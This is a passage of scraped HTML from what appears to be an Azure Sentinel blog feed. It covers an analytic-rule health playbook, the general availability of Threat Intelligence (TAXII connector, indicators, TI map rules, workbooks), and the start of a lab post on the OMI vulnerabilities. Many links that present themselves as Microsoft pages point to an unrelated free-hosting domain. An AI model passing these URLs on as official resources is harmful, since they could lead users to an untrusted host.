class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Sreedhar_Ande_3-1632877959970.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/313468i8B20A19AE27BA1BA/image-size/large?v=v2&amp;px=999" role="button" title="Sreedhar_Ande_3-1632877959970.png" alt="Sreedhar_Ande_3-1632877959970.png" /></span></P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Sreedhar_Ande_4-1632877983177.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/313469i503647B0FBB9CA32/image-size/large?v=v2&amp;px=999" role="button" title="Sreedhar_Ande_4-1632877983177.png" alt="Sreedhar_Ande_4-1632877983177.png" /></span></P> <H2><FONT size="5">Video Tutorial</FONT></H2> <P><LI-VIDEO vid="https://www.youtube.com/watch?v=ULyLB9LOs2g" align="center" size="small" width="200" height="113" uploading="false" thumbnail="https://i.ytimg.com/vi/ULyLB9LOs2g/hqdefault.jpg" external="url"></LI-VIDEO></P> <P>&nbsp;</P> <P>&nbsp;</P> <P><FONT size="5">Conclusion</FONT></P> <P>With this Playbook, Security teams can discover the presence of any auto-disabled rules round-the-clock. It provides near real-time visibility via email/team’s notifications. This will be handy to monitor the health of Azure Sentinel Analytical rules and avoid any interruptions in discovering threats, anomalous behaviors and remediation processes in your environment from your connected data sources/logs. Try it out, and<A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/bd-p/AzureSentinel" target="_blank" rel="noopener">&nbsp;let us know</A>&nbsp;what you think!</P> <P>&nbsp;</P> <P><EM>Thanks to&nbsp;&nbsp;<A href="https://gorovian.000webhostapp.com/?exam=t5/user/viewprofilepage/user-id/124214" target="_blank" rel="noopener">@Yuri Diogenes</A>,&nbsp;<SPAN><A href="https://gorovian.000webhostapp.com/?exam=t5/user/viewprofilepage/user-id/87823" target="_blank" rel="noopener">@Cristhofer Munoz</A>,&nbsp;</SPAN>for their input into this blog post.</EM></P> Mon, 04 Oct 2021 22:24:55 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/monitoring-azure-sentinel-analytical-rules-push-health/ba-p/2793694 Sreedhar_Ande 2021-10-04T22:24:55Z General Availability of Azure Sentinel Threat Intelligence in Public and Azure Government cloud https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/general-availability-of-azure-sentinel-threat-intelligence-in/ba-p/2525227 <P><FONT size="5"><STRONG><SPAN class="TextRun SCXW183183362 BCX0" data-contrast="auto"><SPAN class="NormalTextRun SCXW183183362 BCX0">Introduction</SPAN></SPAN><SPAN class="EOP SCXW183183362 BCX0" data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></STRONG></FONT></P> <P><FONT size="4"><SPAN data-contrast="auto">In today’s era of growing cyber-attacks, Cyber Threat Intelligence (CTI) is a key factor to help Security Operations Center (SOC) analyst&nbsp;triage and respond to incidents. Azure Sentinel is a cloud native SIEM solution that allows&nbsp;customers&nbsp;to import threat intelligence data from various&nbsp;places such as paid threat feeds, open-source feeds,&nbsp;and from various threat intelligence sharing communities like ISAC’s.&nbsp;Today we are announcing the&nbsp;</SPAN><STRONG><SPAN data-contrast="auto">General availability&nbsp;(GA)</SPAN></STRONG><SPAN data-contrast="auto">&nbsp;of&nbsp;<STRONG>Azure Sentinel&nbsp;</STRONG></SPAN><STRONG><SPAN data-contrast="auto">Threat Intelligence&nbsp;</SPAN></STRONG><SPAN data-contrast="auto">in Public cloud and <SPAN class="TextRun SCXW174353307 BCX0" data-contrast="auto"><SPAN class="NormalTextRun SCXW174353307 BCX0">Azure Government cloud</SPAN></SPAN> within 30 days from today.&nbsp;</SPAN></FONT></P> <P><FONT size="4"><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></P> <P><FONT size="4"><SPAN data-contrast="auto">Azure Sentinel supports open-source standards to bring in threat intelligence data into the product like STIX/TAXII.&nbsp;STIX is the data format and TAXII is the sharing protocol widely used in the industry for the purpose of sharing threat intelligence data.&nbsp;Azure Sentinel&nbsp;is one of the major adopters of STIX/TAXII 2.x and promotes this industry standard for sharing threat intelligence data.&nbsp;</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></P> <P><FONT size="4"><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></P> <P><FONT size="4"><SPAN data-contrast="auto">Azure Sentinel also offers a&nbsp;first-class&nbsp;UI to create, search, sort, filter, and tag threat intelligence data in the product without writing any queries.</SPAN></FONT></P> <P>&nbsp;</P> <P><FONT size="4"><SPAN data-contrast="auto">In this blog, we will cover:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></P> <OL> <LI data-leveltext="%1." data-font="Calibri" data-listid="2" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><FONT size="4"><SPAN data-contrast="auto">Easy ways of getting threat intelligence data using TAXII data connector</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></LI> <LI data-leveltext="%1." data-font="Calibri" data-listid="2" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><FONT size="4"><SPAN data-contrast="auto">Management of&nbsp;threat intelligence data in Azure Sentinel</SPAN></FONT></LI> <LI data-leveltext="%1." data-font="Calibri" data-listid="2" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><FONT size="4"><SPAN data-contrast="auto">Putting&nbsp;threat intelligence to use with out-of-the-box analytic rules</SPAN></FONT></LI> <LI data-leveltext="%1." data-font="Calibri" data-listid="2" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><FONT size="4"><SPAN data-contrast="auto">Getting&nbsp;insights into threat intelligence with Workbooks</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></LI> </OL> <P>&nbsp;</P> <P><FONT size="5"><STRONG>Enable the Threat Intelligence – TAXII data connector in Azure Sentinel</STRONG></FONT></P> <P><FONT size="4"><SPAN class="TextRun SCXW173381353 BCX0" data-contrast="auto"><SPAN class="NormalTextRun SCXW173381353 BCX0">STIX/TAXII is the most widely used industry standard for sharing threat intelligence data.<SPAN>&nbsp;</SPAN></SPAN></SPAN><A class="Hyperlink SCXW173381353 BCX0" href="#" target="_blank" rel="noreferrer noopener"><SPAN class="TextRun Underlined SCXW173381353 BCX0" data-contrast="none"><SPAN class="NormalTextRun SCXW173381353 BCX0" data-ccp-charstyle="Hyperlink">STIX is the data format and TAXII is the protocol</SPAN></SPAN></A><SPAN class="TextRun SCXW173381353 BCX0" data-contrast="auto"><SPAN class="NormalTextRun SCXW173381353 BCX0"><SPAN>&nbsp;</SPAN>used to share threat intelligence data. Azure Sentinel offers a built-in TAXII client to import threat intelligence data from TAXII 2.x servers in</SPAN><SPAN class="NormalTextRun SCXW173381353 BCX0"><SPAN>&nbsp;</SPAN>the</SPAN><SPAN class="NormalTextRun SCXW173381353 BCX0"><SPAN>&nbsp;</SPAN>form of a data connector.<SPAN>&nbsp;</SPAN></SPAN></SPAN><SPAN class="EOP SCXW173381353 BCX0" data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></P> <P>&nbsp;</P> <P><FONT size="4"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Image 1.png" style="width: 374px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/294137i65003CE0EBB6CEEB/image-size/large?v=v2&amp;px=999" role="button" title="Image 1.png" alt="Image 1.png" /></span></FONT></P> <P>&nbsp;</P> <P><FONT size="4"><SPAN class="TextRun SCXW119929372 BCX0" data-contrast="auto"><SPAN class="NormalTextRun SCXW119929372 BCX0">To<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SCXW119929372 BCX0">import</SPAN><SPAN class="NormalTextRun SCXW119929372 BCX0"><SPAN>&nbsp;</SPAN>threat intelligence data from a TAXII 2.x server<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SCXW119929372 BCX0">in</SPAN><SPAN class="NormalTextRun SCXW119929372 BCX0">to Azure Sentinel,<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SCXW119929372 BCX0">navigate to the TAXII data connector page under the Data connector gallery of Azure Sentinel.<SPAN>&nbsp;</SPAN></SPAN></SPAN><SPAN class="EOP SCXW119929372 BCX0" data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></P> <P>&nbsp;</P> <P><FONT size="4"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Image 2.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/294150i1CA8271D6D4DA2DC/image-size/large?v=v2&amp;px=999" role="button" title="Image 2.png" alt="Image 2.png" /></span></FONT></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><FONT size="4"><SPAN data-contrast="none">To learn how to configure Threat Intelligence&nbsp;-&nbsp;TAXII data connector&nbsp;in Azure Sentinel step by step visit the&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Threat Intelligence – TAXII documentation</SPAN></A><SPAN data-contrast="none">.&nbsp;</SPAN><SPAN data-ccp-props="{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></FONT></P> <P>&nbsp;</P> <P><FONT size="5"><STRONG>Manage threat intelligence data in Azure Sentinel</STRONG></FONT></P> <P><FONT size="4"><SPAN class="TextRun SCXW171574567 BCX0" data-contrast="auto"><SPAN class="NormalTextRun SCXW171574567 BCX0">The Threat Intelligence blade in Azure Sentinel is a one-stop location to create, view, search, sort, filter</SPAN><SPAN class="NormalTextRun SCXW171574567 BCX0">,</SPAN><SPAN class="NormalTextRun SCXW171574567 BCX0"><SPAN>&nbsp;</SPAN>and tag threat intelligence indicators.<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SCXW171574567 BCX0">This area allows creation of threat intelligence indicators from within the Azure Sentinel interface. Tagging<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SCXW171574567 BCX0">of<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SCXW171574567 BCX0">indicators of compromise</SPAN><SPAN class="NormalTextRun SCXW171574567 BCX0"><SPAN>&nbsp;</SPAN>(IOC)</SPAN><SPAN class="NormalTextRun SCXW171574567 BCX0"><SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SCXW171574567 BCX0">is</SPAN><SPAN class="NormalTextRun SCXW171574567 BCX0"><SPAN>&nbsp;</SPAN>also possible from this area. This helps</SPAN><SPAN class="NormalTextRun SCXW171574567 BCX0"><SPAN>&nbsp;</SPAN>grouping of<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun ContextualSpellingAndGrammarErrorV2 SCXW171574567 BCX0">IOC’s</SPAN><SPAN class="NormalTextRun SCXW171574567 BCX0"><SPAN>&nbsp;</SPAN>and</SPAN><SPAN class="NormalTextRun SCXW171574567 BCX0"><SPAN>&nbsp;</SPAN>relat</SPAN><SPAN class="NormalTextRun SCXW171574567 BCX0">ing</SPAN><SPAN class="NormalTextRun SCXW171574567 BCX0"><SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun ContextualSpellingAndGrammarErrorV2 SCXW171574567 BCX0">IOC’s</SPAN><SPAN class="NormalTextRun SCXW171574567 BCX0"><SPAN>&nbsp;</SPAN>to</SPAN><SPAN class="NormalTextRun SCXW171574567 BCX0"><SPAN>&nbsp;</SPAN>a</SPAN><SPAN class="NormalTextRun SCXW171574567 BCX0"><SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SCXW171574567 BCX0">particular case</SPAN><SPAN class="NormalTextRun SCXW171574567 BCX0">s</SPAN><SPAN class="NormalTextRun SCXW171574567 BCX0"><SPAN>&nbsp;</SPAN>and incident</SPAN><SPAN class="NormalTextRun SCXW171574567 BCX0">.<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SCXW171574567 BCX0">Search</SPAN><SPAN class="NormalTextRun SCXW171574567 BCX0">ing</SPAN><SPAN class="NormalTextRun SCXW171574567 BCX0">,<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SCXW171574567 BCX0">filtering,</SPAN><SPAN class="NormalTextRun SCXW171574567 BCX0"><SPAN>&nbsp;</SPAN>and sorting of threat intelligence data is also available in the product.</SPAN></SPAN><SPAN class="EOP SCXW171574567 BCX0" data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></P> <P>&nbsp;</P> <P><FONT size="4"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Image 4.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/294152iD55622636E19BA32/image-size/large?v=v2&amp;px=999" role="button" title="Image 4.png" alt="Image 4.png" /></span></FONT></P> <P>&nbsp;</P> <P><FONT size="4"><SPAN class="TextRun SCXW116016312 BCX0" data-contrast="auto"><SPAN class="NormalTextRun SCXW116016312 BCX0">To learn more about how to create, tag</SPAN></SPAN><SPAN class="TrackChangeTextInsertion TrackedChange SCXW116016312 BCX0"><SPAN class="TextRun SCXW116016312 BCX0" data-contrast="auto"><SPAN class="NormalTextRun SCXW116016312 BCX0">,</SPAN></SPAN></SPAN><SPAN class="TextRun SCXW116016312 BCX0" data-contrast="auto"><SPAN class="NormalTextRun SCXW116016312 BCX0"><SPAN>&nbsp;</SPAN>and filter indicators</SPAN><SPAN class="NormalTextRun SCXW116016312 BCX0"><SPAN>&nbsp;</SPAN>refer to the</SPAN><SPAN class="NormalTextRun SCXW116016312 BCX0"><SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SCXW116016312 BCX0">documentation<SPAN>&nbsp;<A href="#" target="_self">here</A>.&nbsp;</SPAN></SPAN></SPAN><SPAN class="EOP SCXW116016312 BCX0" data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></P> <P>&nbsp;</P> <P><FONT size="5"><STRONG><SPAN class="TextRun SCXW43525759 BCX0" data-contrast="auto"><SPAN class="NormalTextRun SCXW43525759 BCX0">Put threat intelligence to use with out-of-the-box analytic rules</SPAN></SPAN><SPAN class="EOP SCXW43525759 BCX0" data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></STRONG></FONT></P> <P><FONT size="4"><SPAN data-contrast="auto">Now that threat intelligence data has been imported into Azure Sentinel,&nbsp;it can be used to&nbsp;power analytics to match it against log data which will generate actionable alerts and incidents.&nbsp;SOC analysts can then use these incidents to take actions and prevent organizations&nbsp;against threats.&nbsp;</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></P> <P>&nbsp;</P> <P><FONT size="4"><SPAN data-contrast="auto">Customized analytics rules can be created, or Azure Sentinel offers&nbsp;26 out of the box analytic rules for matching threat indicators imported/created in Azure Sentinel with log data. The out-of-the-box analytic rules are scheduled KQL based rules&nbsp;and begin with the keyword&nbsp;</SPAN><STRONG><SPAN data-contrast="auto">“TI&nbsp;map”.&nbsp;</SPAN></STRONG><SPAN data-contrast="auto">One&nbsp;such example&nbsp;is “TI map IP entity to&nbsp;OfficeActivity” which matches all IP indicators imported into Azure Sentinel&nbsp;with Office Activity logs.&nbsp;</SPAN></FONT></P> <P>&nbsp;</P> <P><FONT size="4"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Image 6.JPG" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/294157iD86EF20B57EC3003/image-size/large?v=v2&amp;px=999" role="button" title="Image 6.JPG" alt="Image 6.JPG" /></span></FONT></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><FONT size="4"><SPAN data-contrast="none">To learn how to enable and create analytic rules, follow the steps mentioned in this&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">documentation</SPAN></A><SPAN data-contrast="none">.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></P> <P>&nbsp;</P> <P><FONT size="5"><STRONG>Get insights into threat intelligence with Workbooks</STRONG></FONT></P> <P><FONT size="4">Azure Sentinel Workbooks are visual charts toobtaininsights into data. Azure Sentinel offers an out of the box workbook called the“Threat intelligence”workbook to getinsightsabout threat intelligence data.This workbook is completely customizable and offers some chartswhichtell about the incidents generated with threat intelligence dataandfeed uniqueness about the feedsbroughtinto Azure Sentinel irrespective of the source.&nbsp;</FONT></P> <P>&nbsp;</P> <P><FONT size="4"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Image 12.JPG" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/294163iAA4B1C7FA92F5213/image-size/large?v=v2&amp;px=999" role="button" title="Image 12.JPG" alt="Image 12.JPG" /></span></FONT></P> <P><FONT size="4"><SPAN class="TextRun SCXW41710278 BCX0" data-contrast="none"><SPAN class="NormalTextRun SCXW41710278 BCX0">Workbooks are great interactive charts to<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SCXW41710278 BCX0">get<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SCXW41710278 BCX0">insights on threat intelligence data like feed uniqueness of TI providers which is important for analysis and understanding of paid feeds.</SPAN></SPAN><SPAN class="EOP SCXW41710278 BCX0" data-ccp-props="{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}">&nbsp;This is a newly added chart to the Threat Intelligence workbook.</SPAN></FONT></P> <P>&nbsp;</P> <P><FONT size="5"><STRONG>Conclusion</STRONG></FONT></P> <P><FONT size="4"><SPAN class="TextRun SCXW99129740 BCX0" data-contrast="auto"><SPAN class="NormalTextRun SCXW99129740 BCX0">With this release of the Azure threat intelligence to General Availability, customers now have a full suite of TI capabilities in Azure Sentinel to advance the SOC TI program and fully utilize the power of TI within the SIEM.</SPAN><SPAN class="NormalTextRun SCXW99129740 BCX0"><SPAN>&nbsp;</SPAN>Over the next couple of months, more threat intelligence enhancements<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SCXW99129740 BCX0">will be released<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SCXW99129740 BCX0">in Azure Sentinel.</SPAN><SPAN class="NormalTextRun SCXW99129740 BCX0"><SPAN>&nbsp;</SPAN></SPAN></SPAN><STRONG><SPAN class="TextRun SCXW99129740 BCX0" data-contrast="auto"><SPAN class="NormalTextRun SCXW99129740 BCX0">The major advantage of threat intelligence being in General Availability is the ability to use them in&nbsp;</SPAN><SPAN class="NormalTextRun SCXW99129740 BCX0">various</SPAN><SPAN class="NormalTextRun SCXW99129740 BCX0">&nbsp;clouds</SPAN><SPAN class="NormalTextRun SCXW99129740 BCX0">&nbsp;</SPAN><SPAN class="NormalTextRun SCXW99129740 BCX0">like&nbsp;</SPAN><SPAN class="NormalTextRun SCXW99129740 BCX0">Public and</SPAN><SPAN class="NormalTextRun SCXW99129740 BCX0">&nbsp;Azure&nbsp;</SPAN><SPAN class="NormalTextRun SCXW99129740 BCX0">Government c</SPAN><SPAN class="NormalTextRun SCXW99129740 BCX0">louds</SPAN><SPAN class="NormalTextRun SCXW99129740 BCX0">.</SPAN></SPAN><SPAN class="EOP SCXW99129740 BCX0" data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></STRONG></FONT></P> <P>&nbsp;</P> Mon, 27 Sep 2021 20:49:27 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/general-availability-of-azure-sentinel-threat-intelligence-in/ba-p/2525227 RijutaKapoor 2021-09-27T20:49:27Z Azure Sentinel To-Go! A Linux 🐧 Lab with AUOMS Set Up to Learn About the OMI Vulnerability 💥 https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/azure-sentinel-to-go-a-linux-lab-with-auoms-set-up-to-learn/ba-p/2772581 <P><SPAN data-contrast="auto"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="main_image.PNG" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/311962i65FABA402DA450D7/image-size/large?v=v2&amp;px=999" role="button" title="main_image.PNG" alt="main_image.PNG" /></span></SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Last week, on September 14</SPAN><SPAN data-contrast="auto">th</SPAN><SPAN data-contrast="auto">, 2021, Microsoft released fixes for three Elevation of Privilege (EoP) vulnerabilities</SPAN><SPAN data-contrast="none">&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">CVE-2021-38645</SPAN></A><SPAN data-contrast="none">,&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">CVE-2021-38649</SPAN></A><SPAN data-contrast="none">,&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">CVE-2021-38648</SPAN></A><SPAN data-contrast="none">,&nbsp;</SPAN><SPAN data-contrast="auto">and one unauthenticated Remote Code Execution (RCE) vulnerability&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">CVE-2021-38647</SPAN></A><SPAN data-contrast="auto">&nbsp;.&nbsp;</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-contrast="none">These vulnerabilities affect the&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Open Management Infrastructure (OMI)</SPAN></A><SPAN data-contrast="none">,&nbsp;an open-source project&nbsp;to further the development of a production quality implementation of the DMTF CIM/WBEM standards. The OMI&nbsp;Common Information Model Object Manager (CIMOM)&nbsp;is also designed to be portable and highly modular. It is written in C and the&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">code is available in GitHub</SPAN></A><SPAN data-contrast="none">.</SPAN></P> <P>&nbsp;</P> <H2 aria-level="1"><FONT size="6"><SPAN data-contrast="none">Great Resources to Read First</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H2> <P><SPAN data-contrast="none">The following resources have&nbsp;already been&nbsp;shared by Microsoft to provide&nbsp;guidance&nbsp;on&nbsp;updating&nbsp;vulnerable extensions for Cloud and On-Premises deployments,&nbsp;and indicators to detect the exploitation of the vulnerability:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="1" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">MSRC:&nbsp;Additional Guidance Regarding OMI Vulnerabilities within Azure VM Management Extensions</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="1" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><A href="https://gorovian.000webhostapp.com/?exam=t5/blogs/blogworkflowpage/blog-id/AzureSentinelBlog/article-id/1697" target="_blank" rel="noopener"><SPAN data-contrast="none">MSTIC: Hunting for OMI Vulnerability Exploitation with Azure Sentinel</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="1" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-security-center/using-asc-to-find-machines-affected-by-omi-vulnerabilities-in/ba-p/2767240" target="_blank" rel="noopener"><SPAN data-contrast="none">Azure Security Center: Using ASC to find machines affected by OMI vulnerabilities in Azure VM Management Extensions</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> <P>&nbsp;</P> <H2 aria-level="1"><FONT size="6"><SPAN data-contrast="none">What is this about?</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H2> <P><SPAN data-contrast="auto">In this post, I&nbsp;will show&nbsp;you how to&nbsp;automatically&nbsp;deploy&nbsp;a&nbsp;research&nbsp;lab environment with&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Azure Sentinel</SPAN></A><SPAN data-contrast="auto">&nbsp;, a few&nbsp;Linux&nbsp;virtual machines&nbsp;and&nbsp;the&nbsp;Microsoft Audit Collection Tool (AUOMS)&nbsp;set up&nbsp;to understand&nbsp;the underlying behavior of the exploitation of the OMI vulnerability.</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-contrast="auto">This is an extension of the amazing work shared&nbsp;by MSTIC&nbsp;through&nbsp;the following resources:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="2" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Kevin Sheldrake</SPAN></A><SPAN data-contrast="auto">&nbsp;-&nbsp;</SPAN><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/hunting-threats-on-linux-with-azure-sentinel/ba-p/1344431" target="_blank" rel="noopener"><SPAN data-contrast="none">Hunting Threats on Linux with Azure Sentinel</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="2" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Jannie Li</SPAN></A><SPAN data-contrast="auto">&nbsp;-&nbsp;</SPAN><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/guided-hunting-notebook-base64-encoded-linux-commands/ba-p/1579484" target="_blank" rel="noopener"><SPAN data-contrast="none">Guided Hunting Notebook: Base64-Encoded Linux Commands</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> <P>&nbsp;</P> <P><STRONG><SPAN class="NormalTextRun BCX8 SCXW145370746">Before going through a few concepts and the deployment process, r</SPAN><SPAN class="NormalTextRun BCX8 SCXW145370746">emember that this vulnerability is actively being exploited. Therefore, make sure you do not expose your lab environment to the Internet</SPAN><SPAN class="NormalTextRun BCX8 SCXW145370746">.</SPAN></STRONG></P> <P>&nbsp;</P> <H2 aria-level="1"><FONT size="5"><FONT size="6"><SPAN data-contrast="none">Microsoft Audit Collection Tool (AUOMS)</SPAN></FONT><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H2> <P><SPAN data-contrast="auto">AUOMS is a Microsoft audit collection tool that can collect events generated by the Linux kernel’s audit subsystem,&nbsp;kaudit, and the optional user-space&nbsp;daemon,&nbsp;auditd.&nbsp;This allows, for example, the&nbsp;collection&nbsp;of&nbsp;syscalls&nbsp;events&nbsp;such as process creations, file access, and other&nbsp;valuable telemetry for research.</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">AUOMS is part of the&nbsp;installation of the&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Log Analytics Agent</SPAN></A>&nbsp;for Linux,<SPAN data-contrast="auto">&nbsp;also known as the&nbsp;&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Operations Management Suite (OMS) Agent for Linux</SPAN></A><SPAN data-contrast="auto">,&nbsp;which 